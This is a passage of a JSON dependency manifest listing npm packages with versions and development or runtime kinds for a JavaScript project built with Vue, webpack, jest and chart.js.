"@nodelib/fs.scandir","ecosystem":"npm","requirements":"2.1.5","direct":false,"kind":"development","optional":false},{"id":13878387845,"package_name":"@nodelib/fs.stat","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":13878387846,"package_name":"@nodelib/fs.walk","ecosystem":"npm","requirements":"1.2.8","direct":false,"kind":"development","optional":false},{"id":13878387847,"package_name":"@sideway/address","ecosystem":"npm","requirements":"4.1.3","direct":false,"kind":"development","optional":false},{"id":13878387848,"package_name":"@sideway/formula","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878387849,"package_name":"@sideway/pinpoint","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878387850,"package_name":"@sinclair/typebox","ecosystem":"npm","requirements":"0.23.5","direct":false,"kind":"development","optional":false},{"id":13878387851,"package_name":"@sindresorhus/is","ecosystem":"npm","requirements":"4.3.0","direct":false,"kind":"development","optional":false},{"id":13878387852,"package_name":"@sinonjs/commons","ecosystem":"npm","requirements":"1.8.3","direct":false,"kind":"development","optional":false},{"id":13878387853,"package_name":"@sinonjs/fake-timers","ecosystem":"npm","requirements":"9.1.2","direct":false,"kind":"development","optional":false},{"id":13878387854,"package_name":"@szmarczak/http-timer","ecosystem":"npm","requirements":"4.0.6","direct":false,"kind":"development","optional":false},{"id":13878387855,"package_name":"@tootallnate/once","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878387856,"package_name":"@types/babel__core","ecosystem":"npm","requirements":"7.1.19","direct":false,"kind":"development","optional":false},{"id":13878387857,"package_name":"@types/babel__generator","ecosystem":"npm","requirements":"7.6.4","direct":false,"kind":"development","optional":false},{"id":13878387858,"package_name":"@types/babel__template","ecosystem":"npm","requirements":"7.4.1","direct":false,"kind":"development","optional":false},{"id":13878387859,"package_name":"@types/babel__traverse","ecosystem":"npm","requirements":"7.17.1","direct":false,"kind":"development","optional":false},{"id":13878387860,"package_name":"@types/body-parser","ecosystem":"npm","requirements":"1.19.2","direct":false,"kind":"development","optional":false},{"id":13878387861,"package_name":"@types/bonjour","ecosystem":"npm","requirements":"3.5.10","direct":false,"kind":"development","optional":false},{"id":13878387862,"package_name":"@types/cacheable-request","ecosystem":"npm","requirements":"6.0.2","direct":false,"kind":"development","optional":false},{"id":13878387863,"package_name":"@types/chart.js","ecosystem":"npm","requirements":"2.9.25","direct":false,"kind":"runtime","optional":false},{"id":13878387864,"package_name":"@types/color-name","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878387865,"package_name":"@types/connect","ecosystem":"npm","requirements":"3.4.35","direct":false,"kind":"development","optional":false},{"id":13878387866,"package_name":"@types/connect-history-api-fallback","ecosystem":"npm","requirements":"1.3.5","direct":false,"kind":"development","optional":false},{"id":13878387867,"package_name":"@types/eslint","ecosystem":"npm","requirements":"7.29.0","direct":false,"kind":"development","optional":false},{"id":13878387868,"package_name":"@types/eslint-scope","ecosystem":"npm","requirements":"3.7.3","direct":false,"kind":"development","optional":false},{"id":13878387869,"package_name":"@types/estree","ecosystem":"npm","requirements":"0.0.51","direct":false,"kind":"development","optional":false},{"id":13878387870,"package_name":"@types/express","ecosystem":"npm","requirements":"4.17.13","direct":false,"kind":"development","optional":false},{"id":13878387871,"package_name":"@types/express-serve-static-core","ecosystem":"npm","requirements":"4.17.28","direct":false,"kind":"development","optional":false},{"id":13878387872,"package_name":"@types/graceful-fs","ecosystem":"npm","requirements":"4.1.5","direct":false,"kind":"development","optional":false},{"id":13878387873,"package_name":"@types/html-minifier-terser","ecosystem":"npm","requirements":"6.1.0","direct":false,"kind":"development","optional":false},{"id":13878387874,"package_name":"@types/http-cache-semantics","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878387875,"package_name":"@types/http-proxy","ecosystem":"npm","requirements":"1.17.8","direct":false,"kind":"development","optional":false},{"id":13878387876,"package_name":"@types/istanbul-lib-coverage","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":13878387877,"package_name":"@types/istanbul-lib-report","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878387878,"package_name":"@types/istanbul-reports","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878387879,"package_name":"@types/jest","ecosystem":"npm","requirements":"27.4.0","direct":false,"kind":"development","optional":false},{"id":13878387880,"package_name":"@types/json-schema","ecosystem":"npm","requirements":"7.0.9","direct":false,"kind":"development","optional":false},{"id":13878387881,"package_name":"@types/keyv","ecosystem":"npm","requirements":"3.1.3","direct":false,"kind":"development","optional":false},{"id":13878387882,"package_name":"@types/mime","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":13878387883,"package_name":"@types/node","ecosystem":"npm","requirements":"17.0.9","direct":false,"kind":"development","optional":false},{"id":13878387884,"package_name":"@types/prettier","ecosystem":"npm","requirements":"2.6.3","direct":false,"kind":"development","optional":false},{"id":13878387885,"package_name":"@types/qs","ecosystem":"npm","requirements":"6.9.7","direct":false,"kind":"development","optional":false},{"id":13878387886,"package_name":"@types/range-parser","ecosystem":"npm","requirements":"1.2.4","direct":false,"kind":"development","optional":false},{"id":13878387887,"package_name":"@types/responselike","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878387888,"package_name":"@types/retry","ecosystem":"npm","requirements":"0.12.1","direct":false,"kind":"development","optional":false},{"id":13878387889,"package_name":"@types/serve-index","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":13878387890,"package_name":"@types/serve-static","ecosystem":"npm","requirements":"1.13.10","direct":false,"kind":"development","optional":false},{"id":13878387891,"package_name":"@types/sockjs","ecosystem":"npm","requirements":"0.3.33","direct":false,"kind":"development","optional":false},{"id":13878387892,"package_name":"@types/stack-utils","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878387893,"package_name":"@types/ws","ecosystem":"npm","requirements":"8.2.2","direct":false,"kind":"development","optional":false},{"id":13878387894,"package_name":"@types/yargs","ecosystem":"npm","requirements":"17.0.10","direct":false,"kind":"development","optional":false},{"id":13878387895,"package_name":"@types/yargs-parser","ecosystem":"npm","requirements":"21.0.0","direct":false,"kind":"development","optional":false},{"id":13878387896,"package_name":"@vue/component-compiler-utils","ecosystem":"npm","requirements":"3.1.2","direct":false,"kind":"development","optional":false},{"id":13878387897,"package_name":"source-map","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"development","optional":false},{"id":13878387898,"package_name":"@vue/test-utils","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":13878387899,"package_name":"@vue/vue2-jest","ecosystem":"npm","requirements":"28.0.0","direct":false,"kind":"development","optional":false},{"id":13878387900,"package_name":"source-map","ecosystem":"npm","requirements":"0.5.6","direct":false,"kind":"development","optional":false},{"id":13878387901,"package_name":"@webassemblyjs/ast","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387902,"package_name":"@webassemblyjs/floating-point-hex-parser","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387903,"package_name":"@webassemblyjs/helper-api-error","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387904,"package_name":"@webassemblyjs/helper-buffer","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387905,"package_name":"@webassemblyjs/helper-numbers","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387906,"package_name":"@webassemblyjs/helper-wasm-bytecode","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387907,"package_name":"@webassemblyjs/helper-wasm-section","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387908,"package_name":"@webassemblyjs/ieee754","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387909,"package_name":"@webassemblyjs/leb128","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387910,"package_name":"@webassemblyjs/utf8","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387911,"package_name":"@webassemblyjs/wasm-edit","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387912,"package_name":"@webassemblyjs/wasm-gen","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387913,"package_name":"@webassemblyjs/wasm-opt","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387914,"package_name":"@webassemblyjs/wasm-parser","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387915,"package_name":"@webassemblyjs/wast-printer","ecosystem":"npm","requirements":"1.11.1","direct":false,"kind":"development","optional":false},{"id":13878387916,"package_name":"@webpack-cli/configtest","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878387917,"package_name":"@webpack-cli/info","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":13878387918,"package_name":"@webpack-cli/serve","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":13878387919,"package_name":"@xtuc/ieee754","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878387920,"package_name":"@xtuc/long","ecosystem":"npm","requirements":"4.2.2","direct":false,"kind":"development","optional":false},{"id":13878387921,"package_name":"abbrev","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878387922,"package_name":"accepts","ecosystem":"npm","requirements":"1.3.7","direct":false,"kind":"development","optional":false},{"id":13878387923,"package_name":"acorn","ecosystem":"npm","requirements":"8.10.0","direct":false,"kind":"development","optional":false},{"id":13878387924,"package_name":"acorn-import-assertions","ecosystem":"npm","requirements":"1.8.0","direct":false,"kind":"development","optional":false},{"id":13878387925,"package_name":"acorn-jsx","ecosystem":"npm","requirements":"5.3.2","direct":false,"kind":"development","optional":false},{"id":13878387926,"package_name":"adm-zip","ecosystem":"npm","requirements":"0.5.9","direct":false,"kind":"development","optional":false},{"id":13878387927,"package_name":"agent-base","ecosystem":"npm","requirements":"6.0.2","direct":false,"kind":"development","optional":false},{"id":13878387928,"package_name":"debug","ecosystem":"npm","requirements":"4.3.1","direct":false,"kind":"development","optional":false},{"id":13878387929,"package_name":"aggregate-error","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878387930,"package_name":"ajv","ecosystem":"npm","requirements":"6.12.6","direct":false,"kind":"development","optional":false},{"id":13878387931,"package_name":"ajv-formats","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878387932,"package_name":"ajv","ecosystem":"npm","requirements":"8.9.0","direct":false,"kind":"development","optional":false},{"id":13878387933,"package_name":"json-schema-traverse","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878387934,"package_name":"ajv-keywords","ecosystem":"npm","requirements":"3.5.2","direct":false,"kind":"development","optional":false},{"id":13878387935,"package_name":"ansi-escapes","ecosystem":"npm","requirements":"4.3.2","direct":false,"kind":"development","optional":false},{"id":13878387936,"package_name":"ansi-html-community","ecosystem":"npm","requirements":"0.0.8","direct":false,"kind":"development","optional":false},{"id":13878387937,"package_name":"ansi-regex","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":13878387938,"package_name":"ansi-styles","ecosystem":"npm","requirements":"3.2.1","direct":false,"kind":"development","optional":false},{"id":13878387939,"package_name":"anymatch","ecosystem":"npm","requirements":"3.1.2","direct":false,"kind":"development","optional":false},{"id":13878387940,"package_name":"argparse","ecosystem":"npm","requirements":"1.0.10","direct":false,"kind":"development","optional":false},{"id":13878387941,"package_name":"array-flatten","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":13878387942,"package_name":"array-union","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878387943,"package_name":"asn1","ecosystem":"npm","requirements":"0.2.4","direct":false,"kind":"development","optional":false},{"id":13878387944,"package_name":"assert-plus","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878387945,"package_name":"assertion-error","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878387946,"package_name":"ast-types","ecosystem":"npm","requirements":"0.13.4","direct":false,"kind":"development","optional":false},{"id":13878387947,"package_name":"tslib","ecosystem":"npm","requirements":"2.3.1","direct":false,"kind":"development","optional":false},{"id":13878387948,"package_name":"async","ecosystem":"npm","requirements":"0.9.2","direct":false,"kind":"development","optional":false},{"id":13878387949,"package_name":"async-limiter","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":13878387950,"package_name":"asynckit","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":13878387951,"package_name":"available-typed-arrays","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":13878387952,"package_name":"aws-sign2","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":13878387953,"package_name":"aws4","ecosystem":"npm","requirements":"1.10.0","direct":false,"kind":"development","optional":false},{"id":13878387954,"package_name":"axios","ecosystem":"npm","requirements":"0.21.4","direct":false,"kind":"development","optional":false},{"id":13878387955,"package_name":"babel-core","ecosystem":"npm","requirements":"7.0.0-bridge.0","direct":false,"kind":"development","optional":false},{"id":13878387956,"package_name":"babel-eslint","ecosystem":"npm","requirements":"10.1.0","direct":false,"kind":"development","optional":false},{"id":13878387957,"package_name":"babel-jest","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387958,"package_name":"babel-loader","ecosystem":"npm","requirements":"8.2.3","direct":false,"kind":"development","optional":false},{"id":13878387959,"package_name":"find-cache-dir","ecosystem":"npm","requirements":"3.3.1","direct":false,"kind":"development","optional":false},{"id":13878387960,"package_name":"make-dir","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878387961,"package_name":"schema-utils","ecosystem":"npm","requirements":"2.7.1","direct":false,"kind":"development","optional":false},{"id":13878387962,"package_name":"babel-plugin-dynamic-import-node","ecosystem":"npm","requirements":"2.3.3","direct":false,"kind":"development","optional":false},{"id":13878387963,"package_name":"babel-plugin-istanbul","ecosystem":"npm","requirements":"6.1.1","direct":false,"kind":"development","optional":false},{"id":13878387964,"package_name":"babel-plugin-jest-hoist","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387965,"package_name":"babel-plugin-polyfill-corejs2","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":13878387966,"package_name":"babel-plugin-polyfill-corejs3","ecosystem":"npm","requirements":"0.5.1","direct":false,"kind":"development","optional":false},{"id":13878387967,"package_name":"babel-plugin-polyfill-regenerator","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":13878387968,"package_name":"babel-preset-current-node-syntax","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878387969,"package_name":"babel-preset-jest","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878387970,"package_name":"balanced-match","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878387971,"package_name":"base64-js","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":13878387972,"package_name":"basic-auth","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878387973,"package_name":"batch","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"development","optional":false},{"id":13878387974,"package_name":"bcrypt-pbkdf","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878387975,"package_name":"big.js","ecosystem":"npm","requirements":"5.2.2","direct":false,"kind":"development","optional":false},{"id":13878387976,"package_name":"binary-extensions","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878387977,"package_name":"bluebird","ecosystem":"npm","requirements":"3.7.2","direct":false,"kind":"development","optional":false},{"id":13878387978,"package_name":"body-parser","ecosystem":"npm","requirements":"1.19.0","direct":false,"kind":"development","optional":false},{"id":13878387979,"package_name":"http-errors","ecosystem":"npm","requirements":"1.7.2","direct":false,"kind":"development","optional":false},{"id":13878387980,"package_name":"inherits","ecosystem":"npm","requirements":"2.0.3","direct":false,"kind":"development","optional":false},{"id":13878387981,"package_name":"qs","ecosystem":"npm","requirements":"6.7.0","direct":false,"kind":"development","optional":false},{"id":13878387982,"package_name":"raw-body","ecosystem":"npm","requirements":"2.4.0","direct":false,"kind":"development","optional":false},{"id":13878387983,"package_name":"bonjour","ecosystem":"npm","requirements":"3.5.0","direct":false,"kind":"development","optional":false},{"id":13878387984,"package_name":"boolbase","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878387985,"package_name":"brace-expansion","ecosystem":"npm","requirements":"1.1.11","direct":false,"kind":"development","optional":false},{"id":13878387986,"package_name":"braces","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":13878387987,"package_name":"browser-stdout","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":13878387988,"package_name":"browserslist","ecosystem":"npm","requirements":"4.19.1","direct":false,"kind":"development","optional":false},{"id":13878387989,"package_name":"bser","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878387990,"package_name":"buffer","ecosystem":"npm","requirements":"6.0.3","direct":false,"kind":"development","optional":false},{"id":13878387991,"package_name":"buffer-from","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878387992,"package_name":"buffer-indexof","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878387993,"package_name":"bytes","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878387994,"package_name":"cacheable-lookup","ecosystem":"npm","requirements":"5.0.4","direct":false,"kind":"development","optional":false},{"id":13878387995,"package_name":"cacheable-request","ecosystem":"npm","requirements":"7.0.2","direct":false,"kind":"development","optional":false},{"id":13878387996,"package_name":"call-bind","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878387997,"package_name":"callsite","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878387998,"package_name":"callsites","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878387999,"package_name":"camel-case","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":13878388000,"package_name":"camelcase","ecosystem":"npm","requirements":"5.3.1","direct":false,"kind":"development","optional":false},{"id":13878388001,"package_name":"caniuse-lite","ecosystem":"npm","requirements":"1.0.30001300","direct":false,"kind":"development","optional":false},{"id":13878388002,"package_name":"caseless","ecosystem":"npm","requirements":"0.12.0","direct":false,"kind":"development","optional":false},{"id":13878388003,"package_name":"chai-nightwatch","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":13878388004,"package_name":"assertion-error","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388005,"package_name":"chalk","ecosystem":"npm","requirements":"2.4.2","direct":false,"kind":"development","optional":false},{"id":13878388006,"package_name":"char-regex","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388007,"package_name":"chart.js","ecosystem":"npm","requirements":"2.9.4","direct":false,"kind":"runtime","optional":false},{"id":13878388008,"package_name":"chartjs-color","ecosystem":"npm","requirements":"2.4.1","direct":false,"kind":"runtime","optional":false},{"id":13878388009,"package_name":"chartjs-color-string","ecosystem":"npm","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":13878388010,"package_name":"chartjs-plugin-datalabels","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"runtime","optional":false},{"id":13878388011,"package_name":"check-more-types","ecosystem":"npm","requirements":"2.24.0","direct":false,"kind":"development","optional":false},{"id":13878388012,"package_name":"chokidar","ecosystem":"npm","requirements":"3.5.3","direct":false,"kind":"development","optional":false},{"id":13878388013,"package_name":"glob-parent","ecosystem":"npm","requirements":"5.1.2","direct":false,"kind":"development","optional":false},{"id":13878388014,"package_name":"chownr","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388015,"package_name":"chrome-trace-event","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388016,"package_name":"ci-info","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388017,"package_name":"cjs-module-lexer","ecosystem":"npm","requirements":"1.2.2","direct":false,"kind":"development","optional":false},{"id":13878388018,"package_name":"clean-css","ecosystem":"npm","requirements":"5.2.2","direct":false,"kind":"development","optional":false},{"id":13878388019,"package_name":"clean-stack","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388020,"package_name":"cli-cursor","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388021,"package_name":"cli-spinners","ecosystem":"npm","requirements":"2.5.0","direct":false,"kind":"development","optional":false},{"id":13878388022,"package_name":"cliui","ecosystem":"npm","requirements":"7.0.4","direct":false,"kind":"development","optional":false},{"id":13878388023,"package_name":"emoji-regex","ecosystem":"npm","requirements":"8.0.0","direct":false,"kind":"development","optional":false},{"id":13878388024,"package_name":"is-fullwidth-code-point","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388025,"package_name":"string-width","ecosystem":"npm","requirements":"4.2.3","direct":false,"kind":"development","optional":false},{"id":13878388026,"package_name":"clone-deep","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388027,"package_name":"clone-response","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388028,"package_name":"co","ecosystem":"npm","requirements":"4.6.0","direct":false,"kind":"development","optional":false},{"id":13878388029,"package_name":"codechecker-api","ecosystem":"npm","requirements":"6.53.0","direct":false,"kind":"runtime","optional":false},{"id":13878388030,"package_name":"codemirror","ecosystem":"npm","requirements":"5.65.0","direct":false,"kind":"runtime","optional":false},{"id":13878388031,"package_name":"collect-v8-coverage","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388032,"package_name":"color-convert","ecosystem":"npm","requirements":"1.9.3","direct":false,"kind":"runtime","optional":false},{"id":13878388033,"package_name":"color-name","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"runtime","optional":false},{"id":13878388034,"package_name":"colorette","ecosystem":"npm","requirements":"2.0.16","direct":false,"kind":"development","optional":false},{"id":13878388035,"package_name":"combined-stream","ecosystem":"npm","requirements":"1.0.8","direct":false,"kind":"development","optional":false},{"id":13878388036,"package_name":"commander","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":13878388037,"package_name":"commondir","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388038,"package_name":"compressible","ecosystem":"npm","requirements":"2.0.18","direct":false,"kind":"development","optional":false},{"id":13878388039,"package_name":"compression","ecosystem":"npm","requirements":"1.7.4","direct":false,"kind":"development","optional":false},{"id":13878388040,"package_name":"bytes","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388041,"package_name":"concat-map","ecosystem":"npm","requirements":"0.0.1","direct":false,"kind":"development","optional":false},{"id":13878388042,"package_name":"condense-newlines","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":13878388043,"package_name":"extend-shallow","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388044,"package_name":"kind-of","ecosystem":"npm","requirements":"3.2.2","direct":false,"kind":"development","optional":false},{"id":13878388045,"package_name":"config-chain","ecosystem":"npm","requirements":"1.1.12","direct":false,"kind":"development","optional":false},{"id":13878388046,"package_name":"connect-history-api-fallback","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":13878388047,"package_name":"consolidate","ecosystem":"npm","requirements":"0.15.1","direct":false,"kind":"development","optional":false},{"id":13878388048,"package_name":"content-disposition","ecosystem":"npm","requirements":"0.5.3","direct":false,"kind":"development","optional":false},{"id":13878388049,"package_name":"content-type","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388050,"package_name":"convert-source-map","ecosystem":"npm","requirements":"1.7.0","direct":false,"kind":"development","optional":false},{"id":13878388051,"package_name":"cookie","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":13878388052,"package_name":"cookie-signature","ecosystem":"npm","requirements":"1.0.6","direct":false,"kind":"development","optional":false},{"id":13878388053,"package_name":"copy-webpack-plugin","ecosystem":"npm","requirements":"10.2.0","direct":false,"kind":"development","optional":false},{"id":13878388054,"package_name":"core-js","ecosystem":"npm","requirements":"3.20.3","direct":false,"kind":"development","optional":false},{"id":13878388055,"package_name":"core-js-compat","ecosystem":"npm","requirements":"3.20.3","direct":false,"kind":"development","optional":false},{"id":13878388056,"package_name":"semver","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"development","optional":false},{"id":13878388057,"package_name":"core-util-is","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388058,"package_name":"corser","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388059,"package_name":"cross-env","ecosystem":"npm","requirements":"7.0.3","direct":false,"kind":"development","optional":false},{"id":13878388060,"package_name":"cross-spawn","ecosystem":"npm","requirements":"7.0.3","direct":false,"kind":"development","optional":false},{"id":13878388061,"package_name":"css-loader","ecosystem":"npm","requirements":"6.5.1","direct":false,"kind":"development","optional":false},{"id":13878388062,"package_name":"icss-utils","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":13878388063,"package_name":"lru-cache","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388064,"package_name":"postcss","ecosystem":"npm","requirements":"8.4.5","direct":false,"kind":"development","optional":false},{"id":13878388065,"package_name":"postcss-modules-extract-imports","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388066,"package_name":"postcss-modules-local-by-default","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388067,"package_name":"postcss-modules-scope","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388068,"package_name":"postcss-modules-values","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388069,"package_name":"semver","ecosystem":"npm","requirements":"7.3.5","direct":false,"kind":"development","optional":false},{"id":13878388070,"package_name":"yallist","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388071,"package_name":"css-select","ecosystem":"npm","requirements":"4.2.1","direct":false,"kind":"development","optional":false},{"id":13878388072,"package_name":"css-tree","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388073,"package_name":"css-what","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":13878388074,"package_name":"cssesc","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388075,"package_name":"dashdash","ecosystem":"npm","requirements":"1.14.1","direct":false,"kind":"development","optional":false},{"id":13878388076,"package_name":"data-uri-to-buffer","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388077,"package_name":"date-fns","ecosystem":"npm","requirements":"2.28.0","direct":false,"kind":"runtime","optional":false},{"id":13878388078,"package_name":"de-indent","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388079,"package_name":"debug","ecosystem":"npm","requirements":"2.6.9","direct":false,"kind":"development","optional":false},{"id":13878388080,"package_name":"decache","ecosystem":"npm","requirements":"4.6.0","direct":false,"kind":"development","optional":false},{"id":13878388081,"package_name":"decamelize","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878388082,"package_name":"decompress-response","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388083,"package_name":"mimic-response","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388084,"package_name":"dedent","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":13878388085,"package_name":"deep-eql","ecosystem":"npm","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":13878388086,"package_name":"type-detect","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":13878388087,"package_name":"deep-equal","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388088,"package_name":"deep-is","ecosystem":"npm","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":13878388089,"package_name":"deepmerge","ecosystem":"npm","requirements":"4.2.2","direct":false,"kind":"development","optional":false},{"id":13878388090,"package_name":"default-gateway","ecosystem":"npm","requirements":"6.0.3","direct":false,"kind":"development","optional":false},{"id":13878388091,"package_name":"defaults","ecosystem":"npm","requirements":"1.0.3